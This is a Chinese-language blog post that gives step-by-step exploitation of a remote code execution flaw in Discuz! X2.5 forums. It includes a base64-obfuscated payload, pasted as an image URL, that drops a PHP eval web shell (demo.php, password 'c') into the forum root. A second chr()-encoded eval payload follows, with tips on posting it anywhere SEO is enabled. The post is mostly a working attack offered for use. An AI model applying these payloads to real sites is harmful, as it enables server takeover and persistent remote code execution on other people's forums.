Discuz! X2.5 最新GetShell0day 详细利用

     听说Discuz!这次又出漏洞了,这次还是个GetShell漏洞呀。这个漏洞比较新,应该很多站还没更新吧。影响版本有:20120407,beta,rc

    Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,

    在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。

    要成功利用此漏洞需要目标启用seo功能。

    下面说下利用方法

    1.注册任意账户

    2.登陆用户,发表blog日志(注意是日志)

    3.添加图片,选择网络图片,地址写入 ↓

     {${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

    4.访问日志,论坛根目录下生成demo.php,一句发密码c 
     

    漏洞要开启seo,并且开启用户日志的seo,漏洞鸡肋,黑站就算了。

    补充一下吧,开seo没错,但是并非他说的非得开日志的seo,我上面文章中说的 “各种地方比如 source/include/space/space_blog.php,

    懂的都懂了” 只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单的,论坛找个板块发贴子就行,

    这主要看管理员开启了哪个位置的seo,如果不知道管理员开了哪的seo就到处都发一下。

    利用方式也并非非得发blog,也不是非得发网络图片,详细的利用我是比如随便发个贴子,内容

    ${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}} 

    然后给他加上任意超链接,发布即可phpinfo(),enjoy it 🙂

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自乐橙呀,原文地址《Discuz! X2.5 最新GetShell0day 详细利用
    标签:
    喜欢 | 0
    分享:

已经有2 条评论抢在你前面了~